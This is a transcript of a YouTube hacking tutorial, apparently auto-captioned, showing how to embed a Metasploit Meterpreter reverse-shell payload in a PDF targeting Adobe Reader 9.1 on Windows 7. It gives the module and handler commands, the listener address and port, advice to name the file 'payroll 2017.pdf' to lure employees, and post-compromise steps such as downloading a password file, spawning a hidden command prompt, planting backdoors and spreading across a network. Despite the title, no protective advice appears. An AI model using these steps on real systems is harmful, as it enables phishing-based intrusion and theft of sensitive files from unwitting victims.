How Hackers Launch PDF Virus File And How We Can Protect Ourselves! (Cybersecurity)

Video Statistics and Information

Video

Captions Word Cloud

Reddit Comments

Captions

hi and welcome back to another episode on how to hack so today we're going to discuss about embedding malicious payload into pdf documents so as we know there are certain applications that are used across millions hundreds of millions of users or could even be billions of different machines whether it's in your endpoints whether it's in your mobile devices or could even be on your server machines so what happened is that many of these applications have inherent vulnerabilities of vulnerabilities discovered by certain computer hackers through the debugging methodologies so in that case when the exploits are available it affects hundreds of millions of users and it has a great pain because it allows you to embed malicious payload and then allow you to have complete control over onto the endpoint so what happened is that in today's tutorial we are going to use a spear phishing methodology it could be true to email it could be true social engineering toolkit on certain platforms or links that you could send to the end user a very targeted approach and then you have to name the file as something that will entice the user to click onto the link download the pdf file and allow you to have complete control over the machine so let's begin the tutorial so on the background i have virtualbox running which is a virtual machine management tool and on the left side of the screen i got windows 7 running so this is going to be the windows 7 victim machine that we're going to target against and on the right side of the screen i have call linux running and i can log into code linux so again as mentioned earlier a lot of different applications have plenty of vulnerabilities and it can result in millions of endpoints becoming vulnerable and of course one of them is adobe reader which is widely used as a free tool allowing you to look into pdf documents so what we're going to do over here is we're going to alter an existing pdf document and then post it onto our website so it could be friends it could be people who download it and it will open up a listener on this system and give us total control of the computer remotely so what we got to do first of all it's going to open up the metasploit tool so we're going to zoom in a little more so it's easier for you to look into the instructions and what you got to do is you can enter search uh you're going to launch it to msf console.q so we will silently open a meta supply framework console uh i do not turn on the database it doesn't matter for this tutorial so once we're in msf you can enter search and you can look for the type which is exploit and you can see the platform as windows that we're targeting against which is majority of endpoints that are using on the operating system so once you click on this uh it will actually cross rule into the exploits that are available within metasploit and it will show you a whole list of the exploits that you can use to hijack in the windows machine together with adobe vulnerabilities so we're just going to wait a little while more as we do not have the database cache so once we get in we can see a huge list of vulnerabilities uh in association with windows systems so again the list is a plenty uh we gotta find the right one that we can use to help us get access into the system so over here uh we can see that we got a couple that we're going to use so we got adobe pdf and beta exe social engineering and a social engineering without javascript so we're going to use this of course it could be any other exploit that you use here in conjunction with your attack but most importantly in the demonstration that you'll learn today is about how to hijack systems so we can enter use exploit windows file format followed by adobe pdf and baited exe so this will help us use the exploit immediately and what we're going to do we can enter info so this will show you all the information about this particular attack so it says very clearly these modules and baits meta split payload into existing pdf file so as part of the pdf file you can use phishing attack the social engineering 2k that you you saw from the earlier tutorials so this will help us accelerate the pace of attacking into the system so moving forward uh what we can see here is we got to set our payload so you enter set payload followed by windows meter preter that we will always use that is it gives us a lot more control a lot more functionalities a lot more features so that we can remain undetected in the attack gain escalation privileges and many other capabilities so once you hit onto this you can actually enter show options so in the show options we gotta hit on the what is the host the listening host that we're going to set so we set l host as 192 168.1 dot so this depends on the the ip address that you actually have on your attacking machine that will host the listener so when i enter ifconfig i see that the attacking machine is 192.168.1.20 so back over here back to the terminal that we're using a meta supply i'll set the l hoses 192 168.1.20 so this can defer depending on the kind of lab environment you're running on so once i hit onto this all we got to do is we got to set the file name so it could be any file name that you want to set so again i enter show information or show options i can see that we have a couple of items that we can set so the file name is currently named as evil.pdf so of course we got to change the file name and we can set it to set file name we can say as payroll 2017 dot pdf so this will make it much easier for the user so maybe you're targeting certain corporate employees in a large enterprise so they will be very keen about the payroll for 2017. so once you set the file name and you have the lhost done you can actually very quickly enter the exploit command and this will create the file that we can use to pass it over to the victim machine so over here we see that the file is stored at root msf4 local payroll 2017.pdf so pretty easy we gotta move the file from root slash dot msf for slash local slash payroll 2017 dot pdf and we're going to move it to var www.html so this is the place where we host our web application server that will then provide the application for the victim to download against so once we are here all we got to do is to move down a little more and we got to set up a listener so once we are here we're going to use exploit multi handler so once we do this we can set the payload that we will be hosting on so meterpreter and a reverse tcp so once we got this running all you got to do is set the lhost as 1i2 168.1.20 so this is the ip address that we're listening on the attacking machine and of course we can click show info so we see the information show options we can see that we have the l port 444 which is the default port that we'll be listening on so and all you got to do is hit run so we got a payload running and going back into the other terminal we gotta check it's our apertures aperture which is a web application server is it running so we see that it is absolutely running so we have the aperture server running so it could be true a spear phishing attack it could be true any form of attacking technique that you use to send a link over to the user so all i got to do is enter 192.168.1.20 followed by the payroll 2017.pdf so when i hit onto this i'm immediately prompted to to actually save some kind of template file into the system we can replace the template file we can click open and it says that we cannot access it because this is open via a internet explorer so when we're sending it through like email or when we're sending it through any other kind of attacking methods uh that will actually open up as a download link and in the download link the user will actually save the file and over here you can see the file is being saved as payroll 2017 and it's adobe reader 9.1 so once we got it we can double click on it and we can click save yes and of course it's the view the encrypted content please take the do not show this message a gain box and press open so once we click open we go back to our meter printer we see that we have session initiated into the ip address of 192.168.1.22 so this is definitely the victim machine so what you can actually do is there are many matters for you to continue so you can enter pwd so this shows you where you are you can enter ls and we show you all the files they're running within the the desktop of the victim machine and of course you can download files you can enter download followed by for example we want to get the password dom results that is over here 127.00 pwd so we can enter 127.0.0.1 and then we can put dot pwd done so this actually helped us download files from the victim machine and of course not only that we can actually look at creating files within the victim machine so we can enter execute dash f cmd.exe dash capital h followed by i so this puts up a command prompt on the background of the victim machine so we can start running windows commands so of course we can enter something like echo you have been hacked and then we can create it into a file maybe i call it a hacked dot txt so this will help us create a file and what you gotta what you can do is actually you can you can have like a live interaction with the victim machine so you can enter hack.txt and this will automatically open up the the notepad file and we can see the content within notepad and of course this show that uh the user has been compromised so there you've seen how easy it was to actually embed malicious executable into adobe documents so like the previous couple of tutorials you could see how we invaded malicious scripting or macro excel into the excel document could be a microsoft word document could be excel sheet and in this instance we're demonstrating an adobe pdf documents so again the applications are endless and we just have to find single vulnerability that's specific for the application and then against a particular operating system and it could easily infect millions of computer users so from there what you can do is you can begin downloading sensitive information you can beginning implanting back doors so that you have consistent access into the system you can escalate privileges using meteopreneur you saw earlier and many of these different attack methodologies allow you to continually have complete control on the entire enterprise landscape so beginning with a spear phishing attack gives you lateral advantage into the endpoint into the enterprise environment and then from there you can begin spreading your attack across into the enterprise network so hope you have learned something valuable today and you have any questions feel free to leave a comment below and thank you so much for watching

Info

Channel: Loi Liang Yang

Views: 151,898

Rating: 4.967907 out of 5

Keywords: hacker, hacking, cracker, cracking, kali linux, cybersecurity, security, anonymous, fbi

Id: 3RSn9JwnWlQ

Channel Id: undefined

Length: 11min 53sec (713 seconds)

Published: Fri Mar 30 2018